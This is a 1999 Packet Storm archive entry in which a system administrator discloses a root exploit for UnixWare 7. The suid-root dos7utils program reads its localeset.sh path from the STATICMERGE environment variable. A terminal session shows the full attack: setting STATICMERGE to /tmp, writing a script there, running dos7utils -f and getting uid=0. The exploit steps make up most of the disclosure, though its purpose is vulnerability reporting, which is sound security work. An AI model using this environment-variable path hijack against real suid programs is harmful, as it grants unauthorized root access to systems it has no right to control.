SCO_root_exploit.txt

1999-10-06T00:00:00
ID PACKETSTORM:16296
Type packetstorm
Reporter Packet Storm
Modified 1999-10-06T00:00:00

Description

                                        
                                            `Greetings,  
  
A vulnerability exists in the /usr/lib/merge/dos7utils program (suid root by  
default) which allows any user to execute any command as root. The dos7utils  
program gets its localeset.sh exec path from the environment variable  
STATICMERGE. By setting this to a directory writable by us and setting the -f  
switch, we can have dos7utils run our program as follows:  
  
  
bash-2.02$ uname -a; id; pwd  
UnixWare fear71 5 7.1.0 i386 x86at SCO UNIX_SVR5  
uid=101(xnec) gid=1(other)  
/usr/lib/merge  
bash-2.02$ export STATICMERGE=/tmp  
bash-2.02$ cat > /tmp/localeset.sh  
#!/bin/sh  
id  
bash-2.02$ chmod 700 /tmp/localeset.sh   
bash-2.02$ ./dos7utils -f bah  
uid=0(root) gid=1(other)  
groups=0(root),1(other),2(bin),3(sys),4(adm),5(uucp),6(mail),7(tty),8(audit),10(nuucp),12(daemon),23(cron),25(dtadmin),47(priv),9(lp)  
bash-2.02$   
----  
  
Searching through the SecurityFocus vulnerability archives yields 0 matches  
for search string "unixware", but several for "openserver". I thought this  
was rather strange, considering that SCO is discontinuing OpenServer after  
5.0.5 in favor of the much more reliable (though not security-wise, evidently)  
UnixWare 7. And so begins my audit of the virgin UnixWare 7 so soon after my  
incomplete audit of SCO 5.0.5.  
  
Brock Tellier  
UNIX Systems Administrator  
  